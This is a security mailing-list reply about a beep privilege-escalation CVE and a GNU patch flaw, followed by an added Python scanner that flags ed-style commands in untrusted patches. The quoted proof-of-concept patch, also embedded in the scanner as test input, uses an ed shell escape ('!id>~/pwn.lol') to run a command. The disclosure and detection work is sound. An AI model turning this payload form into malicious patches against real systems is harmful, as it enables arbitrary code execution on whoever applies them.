Date: Fri, 6 Apr 2018 11:51:40 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Re: Privsec vuln in beep / Code execution in GNU patch

* Hanno Böck <hanno@...eck.de>, 2018-04-06, 08:52:
>There was a joke webpage about a vulnerability in beep a few days ago:
>http://holeybeep.ninja/
>There's also a corresponding Debian Advisory:
>https://lists.debian.org/debian-security-announce/2018/msg00089.html
>Neither have any technical details. CVE is CVE-2018-0492.
>
>If anyone knows the background of this please share it.

Upstream bug report:
https://github.com/johnath/beep/issues/11

>GNU patch supports a legacy "ed" format for patches and that allows 
>executing external commands.
[...]
>--- a	2018-13-37 13:37:37.000000000 +0100
>+++ b	2018-13-37 13:38:38.000000000 +0100
>1337a
>1,112d
>!id>~/pwn.lol

This bug triggers even with -u (which is supposed to disable patch type 
detection). :-/

-- 
Jakub Wilk
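
A pre-flight check one could run on untrusted input before handing it to patch, since -u does not keep the ed path from triggering (added example, not part of the original thread or of GNU patch). It is a heuristic that assumes only unified diffs are accepted, so the "! " change lines of context diffs are flagged too; `scan_patch`, `POC` and `BENIGN` are hypothetical names, and `BENIGN` is constructed sample input.

```python
import re

# Unified-diff hunk header; a count defaults to 1 when omitted.
HUNK = re.compile(r'^@@ -\d+(?:,(\d+))? \+\d+(?:,(\d+))? @@')
# ed-style edit command: a line address or range followed by a/c/d/i.
ED_CMD = re.compile(r'^\d+(?:,\d+)?[acdi]$')

def scan_patch(text):
    """Return [(lineno, kind, line)] for ed-style lines outside unified hunks."""
    findings = []
    old_left = new_left = 0            # body lines still owed to the current hunk
    for no, line in enumerate(text.splitlines(), 1):
        if old_left > 0 or new_left > 0:
            tag = line[:1] or ' '      # empty line: context line with its space stripped
            if tag in ' -+\\':
                if tag in ' -':
                    old_left -= 1
                if tag in ' +':
                    new_left -= 1
                continue               # legitimate hunk body, never inspected further
            old_left = new_left = 0    # malformed body: stop trusting the hunk
        m = HUNK.match(line)
        if m:
            old_left = int(m.group(1) or 1)
            new_left = int(m.group(2) or 1)
        elif line.startswith('!'):
            findings.append((no, 'shell-escape', line))
        elif ED_CMD.match(line):
            findings.append((no, 'ed-command', line))
    return findings

# The input quoted in the message above: unified-looking headers, ed body.
POC = ("--- a\t2018-13-37 13:37:37.000000000 +0100\n"
       "+++ b\t2018-13-37 13:38:38.000000000 +0100\n"
       "1337a\n1,112d\n!id>~/pwn.lol\n")

# Constructed benign unified diff whose changed lines happen to start with '!'.
BENIGN = ("--- a/hello.txt\n+++ b/hello.txt\n@@ -1,3 +1,3 @@\n"
          " first\n-!old line\n+!new line\n last\n")

if __name__ == "__main__":
    for name, sample in (("POC", POC), ("BENIGN", BENIGN)):
        print(name, scan_patch(sample) or "no ed-style lines")
```

Refuse to invoke patch when `scan_patch` returns anything. The check inspects the file's contents only and does not depend on which format options patch is given.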
